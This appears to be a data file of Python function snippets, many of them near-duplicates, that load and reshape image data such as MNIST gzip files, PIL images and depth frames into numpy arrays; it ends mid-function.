[ "def _images(path):\r\n with gzip.open(path) as f:\r\n # First 16 bytes are magic_number, n_imgs, n_rows, n_cols\r\n pixels = np.frombuffer(f.read(), 'B', offset=16)\r\n return pixels.reshape(-1, 784).astype('float32') / 255", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, 1)\n return data", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n# data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE * IMAGE_SIZE)\n return data", "def image_batch():\n return np.zeros((2, 1, 4, 4))", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)\n return data", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)\n return data", "def _extract_images(self, filename):\n log.info('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = self._read32(bytestream)\n rows = self._read32(bytestream)\n cols = self._read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def imgsz(self) -> np.ndarray:\n return self._vector[6:8].astype(int)", "def depr_depth_images(self):\n if not hasattr(self, '_depr_depth_images'):\n depth_images = self._archive['gaps_depth']\n self._depr_depth_images = depth_images.reshape([1, 20, 224, 224, 1])\n return self._depr_depth_images", "def extract_data(filename, num_images, IMAGE_WIDTH):\n\n# this function definition has been taken from internet\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_WIDTH * IMAGE_WIDTH * num_images)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32) #Interpret a buffer as a 1-dimensional array\n data = data.reshape(num_images, IMAGE_WIDTH*IMAGE_WIDTH)\n return data", "def get_img_array(myzipfile, imgid, shape=(299,299)):\n img_arr = np.zeros(shape=(512, 512, 3), dtype=np.float32)\n img_green = Image.open(myzipfile.open(f'{imgid}_green.png'))\n img_blue = Image.open(myzipfile.open(f'{imgid}_blue.png'))\n img_red = Image.open(myzipfile.open(f'{imgid}_red.png'))\n img_yellow = 
Image.open(myzipfile.open(f'{imgid}_yellow.png'))\n img_arr[:,:,0] = np.divide(np.array(img_green), 255)\n img_arr[:,:,1] = np.divide(np.array(img_blue), 255)/2 + np.divide(np.array(img_yellow), 255)/2\n img_arr[:,:,2] = np.divide(np.array(img_red), 255)/2 + np.divide(np.array(img_red), 255)/2\n img_arr = cv2.resize(img_arr, shape)\n return img_arr", "def _extract_images(image_paths):\n\n num_images = len(image_paths)\n data = np.zeros((num_images, _IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS))\n for i in range(num_images):\n image_path = image_paths[i]\n print('Extracting images from: ', image_path)\n image = imageio.imread(image_path)\n data[i] = image\n\n return data", "def pix2pix_results_to_frames(img_array):\n frames = []\n\n for i in range(int(len(img_array)/3)):\n\n try:\n left = cv2.resize(img_array[i * 3], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n right = cv2.resize(img_array[i * 3 + 2], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n\n scale = 512/img_array[i * 3 + 1].shape[0]\n middle = cv2.resize(img_array[i * 3 + 1], (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_NEAREST)\n\n frames.append(np.concatenate((left, middle, right), axis=1))\n\n frames.append(img_array[i * 3+1])\n except:\n print(\"Error\")\n\n return frames", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = _read32(bytestream)[0]\n rows = _read32(bytestream)[0]\n cols = _read32(bytestream)[0]\n #print('check', magic, num_images, rows, cols, rows * cols * num_images)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def _convert_images(raw):\n # Convert the raw images from the data-files to floating-points.\n #raw_float = np.array(raw, dtype=float) / 255.0\n\n # Reshape the array to 4-dimensions.\n images = raw.reshape([-1, num_channels, img_size, img_size])\n\n # Reorder the indices of the array.\n images = images.transpose([0, 2, 3, 1])\n\n return images", "def extract_data(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)\n return data", "def extract_data(filename,norm_shift=False,norm_scale=True,tag=1):\n print('Extracting',filename)\n data = extractdb_images(filename,tag)\n\n if norm_shift:\n data = data-(PIXEL_DEPTH/2.0)\n if norm_scale:\n data = data/PIXEL_DEPTH\n\n num = data.shape[0]\n data = np.reshape(data,[num,-1])\n # print(data.shape) #(2304,4096) #(576,4096)\n\n return data", "def extract_images(filename):\n\tprint('Extracting', filename)\n\twith gzip.open(filename) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, filename))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 
1)\n\t\treturn data", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def convert_to_numpy(color_frame, aligned_depth_frame):\n depth_image = np.asanyarray(aligned_depth_frame.get_data())\n frame = np.asanyarray(color_frame.get_data())\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n return frame, depth_image", "def imageToArray(i):\r\n a=gdalnumeric.numpy.fromstring(i.tostring(),'b')\r\n a.shape=i.im.size[1], i.im.size[0]\r\n return a", "def raw_image(self):\n return self.data16.transpose()", "def tile_images(image_stack):\n assert len(image_stack.shape) == 4\n image_list = [image_stack[i, :, :, :] for i in range(image_stack.shape[0])]\n tiled_images = np.concatenate(image_list, axis=1)\n return tiled_images", "def create_images_as_numpy(idx, out_dir, model_outs, K):\n masks = model_outs['pis'].exp()\n sub_images = model_outs['x_loc']\n\n images = []\n all_masks = []\n all_subis = []\n for i in range(K):\n images += [masks[i,0] * sub_images[i,0]]\n all_masks += [masks[i,0]]\n all_subis += [sub_images[i,0]]\n\n images = torch.stack(images)\n all_masks = torch.stack(all_masks)\n all_subis = torch.stack(all_subis)\n whole_image = images.sum(0)\n\n all_masks_grid = torchvision.utils.make_grid(all_masks, nrow=K)\n all_subis_grid = torchvision.utils.make_grid(all_subis, nrow=K)\n all_images_grid = torchvision.utils.make_grid(images, nrow=K)\n \n filepath = out_dir / f'whole_image_{idx}'\n np.save(filepath, whole_image.data.cpu().numpy())\n filepath = out_dir / f'all_images_{idx}'\n np.save(filepath, all_images_grid.data.cpu().numpy())\n filepath = out_dir / f'masks_{idx}'\n np.save(filepath, all_masks_grid.data.cpu().numpy())\n filepath = out_dir / f'sub_images_{idx}'\n np.save(filepath, all_subis_grid.data.cpu().numpy())", "def get_pixel_list(img):\n orig_shape = img.shape # Remember the original shape of the img.\n # Store the img as a x by z array (z being the length of the colour space)\n # Essentially just a list of pixels.\n\n if len(img.shape) == 3:\n img = img.reshape(img.shape[0] * img.shape[1], img.shape[2])\n elif len(img.shape) == 2:\n img = img.reshape(img.shape[0] * img.shape[1],)\n return orig_shape, img", "def get_image(self):\n image = np.frombuffer(self.image, dtype=np.uint8)\n return image.reshape(*self.size, self.channels)", "def _extract_array(tiffs: list[np.ndarray], idx: int, shape: tuple[int, ...], dtype: type | np.dtype) -> np.ndarray:\n feature_arrays = (np.atleast_3d(img)[..., idx] for img in tiffs)\n return np.asarray(list(feature_arrays), dtype=dtype).reshape(*shape, 1)", "def image2array(im):\n\n arr = numpy.zeros(im.size)\n\n for x in xrange(im.size[0]):\n for y in xrange(im.size[1]):\n arr[x,y] = im.getpixel((x,y))\n\n return arr", "def get_image():\n image_response = client.simGetImages([airsim.ImageRequest(\"0\", airsim.ImageType.Scene, False, False)])[0]\n image1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8)\n image_rgba = image1d.reshape(image_response.height, image_response.width, 4)\n return image_rgba[78:144,1:255,0:3].astype(float)\n # return image_rgba[78:144,76:255,0:3].astype(float)", 
"def get_raw(self) -> bytearray:\n img_bytes = bytearray()\n for i in range(self.grid_size[0]):\n if self.grid[i] is not None:\n for j in range(self.grid_size[1]):\n if self.grid[i][j] is not None:\n color = self.grid[i][j]\n color = color.get_byte_representation()\n for k in range(len(color)):\n img_bytes.append(color[k])\n return img_bytes", "def getByteArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def DEPTH(frame):\n\tdepth = np.empty(( 240, 320, 1 ), np.uint16)\n\tframe.image.copy_bits( depth.ctypes.data )\n\tcv2.imshow( 'VideoDEPTH', depth )", "def view_image(train_dataloader):\n for (x, target) in train_dataloader:\n np.save(\"img.npy\", x)\n print(x.shape)\n exit(0)", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def read(self, index):\n assert type(index) is int\n img = self.db.get_node('/images/img{:04d}'.format(index))\n return np.array(img)", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def r2n2_xyz_images(self):\n if not hasattr(self, '_r2n2_xyz_images'):\n xyz_images = []\n for i in range(24):\n im_i = geom_util_np.apply_4x4(\n self.r2n2_cam_images[i, ...],\n self.r2n2_cam2world[i, ...],\n are_points=True)\n mask = 
np_util.make_mask(self.r2n2_depth_images[i, ...])\n xyz_images.append(np_util.zero_by_mask(mask, im_i).astype(np.float32))\n self._r2n2_xyz_images = np.stack(xyz_images)\n return self._r2n2_xyz_images", "def readData():\n\tN = 800\n\tD = 28*28\n\tX = np.zeros((N, D), dtype=np.uint8)\n\n\tf = open(\"data/a012_images.dat\", 'rb')\n\n\tfor i in range(0, N):\n\t\tX[i, :] = np.fromstring(f.read(D), dtype='uint8')\n\n\tf.close()\n\n\treturn X", "def image(self):\n return self.pixels.get_array()", "def prepare_data(data):\n\n image_array = np.zeros(shape=(len(data), 48, 48))\n image_label = np.array(list(map(int, data['emotion'])))\n\n for i, row in enumerate(data.index):\n image = np.fromstring(data.loc[row, 'pixels'], dtype=int, sep=' ')\n image = np.reshape(image, (48, 48))\n\n image = face_detection(image.astype(np.uint8))\n\n image_array[i] = image\n\n return image_array, image_label", "def cut4(image):\r\n i, j = image.shape\r\n a1 = image[:i // 2, :j // 2]\r\n a2 = image[i // 2:, :j // 2]\r\n a3 = image[:i // 2, j // 2:]\r\n a4 = image[i // 2:, j // 2:]\r\n return a1, a2, a3, a4", "def find_pixels(self):\n ref_image=Image.open('sample0000.png')\n imarray=np.array(ref_image)\n ref_image.close()\n self.number_of_pix=imarray.shape\n print self.number_of_pix\n ref_image=None\n imarray=None", "def get_4d(slice, copylayers=[], transparancy=0):\n assert slice.ndim < 3\n img = np.zeros(slice.shape)\n img = img[:, :, np.newaxis]\n img = np.repeat(img, 4, 2)\n transparancy = 255 - (255 * transparancy)\n img[:, :, -1] = transparancy\n for layer in copylayers:\n img[:, :, layer] = slice\n return(img)", "def extract_images(f):\n\tprint('Extracting', f.name)\n\twith gzip.GzipFile(fileobj=f) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %\n\t\t\t\t\t\t\t\t\t\t\t (magic, f.name))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 1)\n\t\treturn data", "def get_images(path_list):\n images = []\n labels = []\n names = []\n i = 0\n for path in path_list:\n for fruit_dir_path in glob.glob(path):\n fruit_label = fruit_dir_path.split(\"/\")[-1]\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.jpg\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n\n image = cv2.resize(image, (45, 45))\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n images.append(image)\n names.append(fruit_label)\n labels.append(i)\n i += 1\n\n images = np.array(images)\n print(images.shape)\n # add a new dimension here\n with np.nditer(images, op_flags=['readwrite']) as it:\n for x in it:\n x = np.expand_dims(x, axis=0)\n labels = np.array(labels)\n return images, labels, i", "def convert_3d(points_2d, depth_image, image):\n fx = 525.0 # focal length x\n fy = 525.0 # focal length y\n cx = 319.5 # optical center x\n cy = 239.5 # optical center y\n factor = 5000 # for the 16-bit PNG files\n points_3d = []\n cols = []\n colors = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n for v in range(depth_image.shape[0]):\n for u in range(depth_image.shape[1]):\n Z = depth_image[v,u] / factor\n X = (u - cx) * Z / fx\n Y = (v - cy) * Z / fy\n points_3d.append([X,Y,Z])\n cols.append(colors[v,u])\n points = []\n for i in range(len(points_2d)):\n x = int(points_2d[i,0])\n y = int(points_2d[i,1])\n # print(y)\n Z = depth_image[y,x] / factor\n 
X = (x - cx) * Z / fx\n Y = (y - cy) * Z / fy\n points.append([X,Y,Z])\n points_3d = np.array(points_3d)\n cols = np.array(cols)\n points = np.array(points)\n \n return points, points_3d, cols", "def _reshape(self, data):\n\n\t\td = np.zeros((32,32,3))\n\t\td_r = data[0:1024].reshape(32,32)\n\t\td_g = data[1024:2048].reshape(32,32)\n\t\td_b = data[2048:].reshape(32,32)\n\n\t\tfor h in range(32):\n\t\t for w in range(32):\n\t\t for c in range(3):\n\n\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\tarray = np.array(d, dtype=np.uint8)\n\t\timg = Image.fromarray(array)\n\t\ttemp = img.resize(size = (64,64))\n\t\td = image.img_to_array(temp)\n\n\t\t#plt.imshow(d)\n\t\t#plt.show()\n\t\treturn d", "def reshape_pixel_array(self, pixel_arr):\n reshaped_pixel_arr = []\n n = 28\n while n <= len(pixel_arr):\n reshaped_pixel_arr.append(pixel_arr[n-28:n])\n n+=28\n\n return reshaped_pixel_arr", "def _reshape(self, data):\n\n\t\t\td = np.zeros((32,32,3))\n\t\t\td_r = data[0:1024].reshape(32,32)\n\t\t\td_g = data[1024:2048].reshape(32,32)\n\t\t\td_b = data[2048:].reshape(32,32)\n\n\t\t\tfor h in range(32):\n\t\t\t for w in range(32):\n\t\t\t for c in range(3):\n\n\t\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\t\tarray = np.array(d, dtype=np.uint8)\n\t\t\timg = Image.fromarray(array)\n\t\t\ttemp = img.resize(size = (64,64))\n\t\t\td = image.img_to_array(temp)\n\n\t\t\t#plt.imshow(d)\n\t\t\t#plt.show()\n\t\t\treturn d", "def get_image_array_from_example(example):\n features = example.features.feature\n img = features['image/encoded'].bytes_list.value[0]\n shape = features['image/shape'].int64_list.value[0:3]\n return np.frombuffer(img, np.uint8).reshape(shape)", "def reconstructImage(self,arr):\n\t\tarr = arr * 256\n\t\tarr = np.array(np.round(arr),dtype=np.uint8)\n\t\t#arr = np.array(arr,dtype=np.uint8)\n\n\t\t# We need to transpose the array because we flatten X by columns\n\t\t#arr = arr.T\n\t\t#a = arr.reshape((self.width, self.height,3))\n\t\t\n\t\tif self.mode == 'L':\n\t\t\ta = arr.reshape((self.width, self.height))\n\t\telse:\n\t\t\ta = arr.reshape((self.width, self.height,3))\n\n\t\t#a = arr.reshape((3,self.width, self.height))\t\t\n\t\t#a = arr.transpose(0, 3, 1, 2)\n\n\t\tim = Image.fromarray(a,mode=self.mode)\n\n\t\treturn im", "def imread(filename):\n return np.asarray(Image.open(filename), dtype=np.uint8)[..., :3]", "def extract_labels(filename, num_images):\n\n# this function definition has been taken from internet \n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64) #Interpret a buffer as a 1-dimensional array\n return labels", "def imagefile_to_array(imagefname):\n with Image.open(imagefname) as image: \n im_arr = np.fromstring(image.tobytes(), dtype=np.uint8)\n rows = image.size[1]\n cols = image.size[0]\n no_channels = int(len(im_arr)/rows/cols)\n im_arr = im_arr.reshape((rows, cols, no_channels))\n im_arr = np.rollaxis(im_arr,-1)\n return im_arr", "def get_img():\n\timg = camera.Capture()\n\tarray = jetson.utils.cudaToNumpy(img)\n\n\treturn(array)", "def img2np_pillow(filename):\n with Image.open(filename) as image:\n nparr = np.fromstring(image.tobytes(), dtype=np.uint8)\n nparr = im_arr.reshape((image.size[1], image.size[0], 3))\n return nparr", "def get_image(filepath,size):\n image = 
Image.open(filepath)\n newimage = image.resize((size,size)).convert('LA')\n pixels = np.asarray(newimage,dtype = np.float32)[:,:,0]\n return pixels", "def np_image_matrix(self):\n return np.array(self.crop_image())", "def extract_data(filename, num_images, starting_id, context_factor):\n imgs = []\n for i in range(starting_id, num_images+starting_id):\n imageid = \"satImage_%.3d\" % i\n image_filename = filename + imageid + \".png\"\n if os.path.isfile(image_filename):\n print ('Loading ' + image_filename)\n img = mpimg.imread(image_filename)\n\n\n imgs.append(img)\n else:\n print ('File ' + image_filename + ' does not exist')\n\n num_images = len(imgs)\n IMG_WIDTH = int(imgs[0].shape[0]/DOWNSCALE)\n IMG_HEIGHT = int(imgs[0].shape[1]/DOWNSCALE)\n N_PATCHES_PER_IMAGE = (IMG_WIDTH/IMG_PATCH_SIZE)*(IMG_HEIGHT/IMG_PATCH_SIZE)\n\n\n img_patches = [img_crop_context(imgs[i], IMG_PATCH_SIZE, IMG_PATCH_SIZE,context_factor, sub_mean=True) for i in range(num_images)]\n data = [img_patches[i][j] for i in range(len(img_patches)) for j in range(len(img_patches[i]))]\n data = np.asarray(data)\n return data", "def get_image(image_path):\r\n image = Image.open(image_path, 'r')\r\n width, height = image.size\r\n pixel_values = list(image.getdata())\r\n if image.mode == 'RGB':\r\n channels = 3\r\n elif image.mode == 'L':\r\n channels = 1\r\n else:\r\n print(\"Unknown mode: %s\" % image.mode)\r\n return None\r\n pixel_values = np.array(pixel_values).reshape((1,width, height, channels))\r\n # print(pixel_values.shape)\r\n return pixel_values", "def extract_4_pics(im_rgb, im):\r\n _, w = im.shape\r\n \r\n # Find indices of the longest horizontal and vertical lines\r\n hor_indices, ver_indices, _, _ = find_longest_lines(im)\r\n\r\n # Find the 4 longest horizontal lines\r\n hor_indices = np.sort(hor_indices[:8])\r\n hor_lines = np.array([hor_indices[0], 0, 0, 0])\r\n \r\n # line 2-4\r\n cur = 0;\r\n thresholds = [0.42*w, w/50];\r\n for i in range(cur,8):\r\n if hor_indices[i] - hor_lines[cur] > thresholds[cur%2]:\r\n cur += 1;\r\n hor_lines[cur] = hor_indices[i];\r\n if cur == 3:\r\n break\r\n \r\n # vertical lines\r\n ver_indices = np.sort(ver_indices[:8]);\r\n ver_lines = np.array([ver_indices[0], 0,0,0]);\r\n \r\n # line 2-4\r\n cur = 0;\r\n for i in range(cur, 8):\r\n if ver_indices[i] - ver_lines[cur] > thresholds[cur%2]:\r\n cur += 1;\r\n ver_lines[cur] = ver_indices[i];\r\n if cur == 3:\r\n break\r\n \r\n im[:,ver_lines] = 255\r\n im[hor_lines,:] = 255\r\n \r\n # Extract images\r\n pic1 = im_rgb[hor_lines[0]:hor_lines[1], ver_lines[0]:ver_lines[1], :]\r\n pic2 = im_rgb[hor_lines[0]:hor_lines[1], ver_lines[2]:ver_lines[3], :]\r\n pic3 = im_rgb[hor_lines[2]:hor_lines[3], ver_lines[0]:ver_lines[1], :]\r\n pic4 = im_rgb[hor_lines[2]:hor_lines[3], ver_lines[2]:ver_lines[3], :]\r\n pics = [pic1, pic2, pic3, pic4]\r\n \r\n return pics", "def get_rendered_image(self) -> np.ndarray:\n return np.transpose(self.state['observation'], [1, 2, 0])", "def img_to_array(img, path=True):\n global width, height\n\n if path:\n img = Image.open(img)\n img_arr = np.array(img) / 255.0\n img_arr = img_arr.reshape(width, height, channels)\n \n return img_arr", "def slice_array():\n img = Image.open(\"flamingo.jpg\")\n image_as_array = np.array(img)\n width, height, depth = image_as_array.shape\n\n red_channel = image_as_array[:, :, 0]\n green_channel = image_as_array[:, :, 1]\n blue_channel = image_as_array[:, :, 2]\n\n top_left_corner = image_as_array[:height // 2, :width // 2, :]\n top_right_corner = image_as_array[:height // 2, 
width // 2:, :]\n random_middle_pixels = image_as_array[11:29, 101:400, :]", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def data_reshape(image):\n image_mat = []\n if image.shape[-1] == 3:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j[0], j[1], j[2]])\n else:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j])\n return np.array(image_mat)", "def _extract_data_sub_stack(self, startRow, endRow):\n # Grab the shape of the image stack\n nz, ny, nx = self.shape\n\n # Compute the number of rows in this sub stack\n numberOfRows = endRow - startRow\n\n # Build an array for storing output\n outData = np.zeros((nz, numberOfRows, nx))\n\n # Loop through each image and extract its data\n for zInd, img in enumerate(self.imageList):\n outData[zInd, :, :] = img.data[startRow:endRow, :]\n\n return np.ma.array(outData)", "def tiffread(fname):\n from PIL import Image\n img = Image.open(fname)\n \n res = []\n offsets = []\n frame = 0\n try:\n for frame in itertools.count():\n img.seek(frame)\n aux = np.asarray(img)\n if aux.ndim == 0:\n if img.mode == 'I;16':\n aux = np.fromstring(img.tostring(), np.uint16)\n aux = np.reshape(aux, img.size[::-1])\n elif img.mode == 'I;16S':\n aux = np.fromstring(img.tostring(), np.int16)\n aux = np.reshape(aux, img.size[::-1])\n else:\n raise ValueError, \"unknown pixel mode\"\n res.append(aux)\n except EOFError:\n pass\n \n return np.asarray(res)", "def concat_images(X):\n nc,h,w,_ = X.shape\n X = X.reshape(nc,h,w)\n n = np.ceil(np.sqrt(nc)).astype(\"int8\")\n img = np.zeros((n*w,n*h))\n x = 0\n y = 0\n for example in range(nc):\n img[x*w:(x+1)*w,y*h:(y+1)*h] = X[example]\n y += 1\n if y >= n:\n y = 0\n x += 1\n return img", "def generate_2D(X):\n\n\tno_of_images = len(X)\n\tdata = np.zeros((no_of_images, 28, 28))\n\n\tfor i in xrange(no_of_images):\n\t\tdata[i] = np.copy(X[i].reshape(28, 28))\n\n\treturn data", "def flatten_pixcoord(image):\n hdr = pyfits.getheader(image)\n naxis1 = hdr['naxis1']\n naxis2 = hdr['naxis2']\n pixcoord = np.mgrid[1:naxis1+1,1:naxis2+1]\n pixcoord = pixcoord.swapaxes(0,1).swapaxes(1,2)\n pixcoord = pixcoord.ravel().reshape(naxis1*naxis2, 2)\n return pixcoord", "def features_to_np_array(self, images):\n \n images = list(images)\n \n images = np.stack(images, axis=0)\n \n return images", "def pngxy(data):\n ihdr = data.index(b'IHDR')\n # next 8 bytes are width/height\n w4h4 = data[ihdr+4:ihdr+12]\n return struct.unpack('>ii', w4h4)", "def arr(img_arr, img_wid, img_hei):\n X = torch.Tensor(img_arr).view(-1, 1, img_wid, img_hei)\n X = X/255.0\n return X", "def __readImages(self, filename):\n print 'Reading images from %s ...' 
% filename\n images = []\n with open(filename, 'rb') as infile:\n infile.read(4) # ignore magic number\n count = struct.unpack('>i', infile.read(4))[0]\n rows = struct.unpack('>i', infile.read(4))[0]\n columns = struct.unpack('>i', infile.read(4))[0]\n\n for i in xrange(count):\n data = infile.read(rows*columns)\n image = np.fromstring(data, dtype=np.uint8)\n image = image.reshape((rows, columns))\n image = 255 - image # now black digit on white background\n images.append(image)\n return images", "def _colored_img_to_arr(image, verbose=False):\n height, width = image.size\n arr = np.array(image.getdata())\n arr = arr.reshape(3, height, width)\n r = arr[0]\n g = arr[1]\n b = arr[2]\n return r, g, b", "def imagesMatrix(path,imageSize = 10304,byteorder = '>'):\n listing = os.listdir(path)\n listing.sort()\n count = 0\n docFiles = []\n for infile in listing:\n count = count + 1\n docFiles.append(infile)\n matrix = np.zeros((imageSize,count))\n for i in range(len(listing)):\n matrix[:,i]=np.asarray(read_pgm(join(path,listing[i]),byteorder)).reshape(-1)\n return matrix,listing", "def images16(self, first, last, shape, validfirst, validlast):\n size = shape[0] * shape[1] * (1 + last - first)\n array = np.ascontiguousarray(np.zeros(size, dtype=np.int16))\n self.lib.GetImages16(ct.c_long(first), ct.c_long(last),\n array.ctypes.data_as(ct.POINTER(ct.c_int16)),\n ct.c_ulong(size),\n ct.pointer(ct.c_long(validfirst)),\n ct.pointer(ct.c_long(validlast)))\n\n return array.reshape(-1, shape[0], shape[1])", "def image_decoder(rawbytes):\n img = Image.open(BytesIO(rawbytes))\n array = np.asarray(img, dtype=np.uint8)\n return array", "def debug_image(self, state_index: int = -1):\n image = self.make_image(state_index, channel_type=\"n\")\n return np.array([np.sum(arr) for arr in image])[3:].reshape(8, 12)", "def create_array_from_rgb_layers(vk4_container, layer_list):\n log.debug(\"Entering create_array_from_rgb_layers\")\n width = vk4_container.image_width\n height = vk4_container.image_height\n\n new_array = np.zeros(((width * height), 3), dtype=np.uint8)\n for layer in layer_list:\n i = 0\n for rgb in layer:\n new_array[i][0] += rgb[0]\n new_array[i][1] += 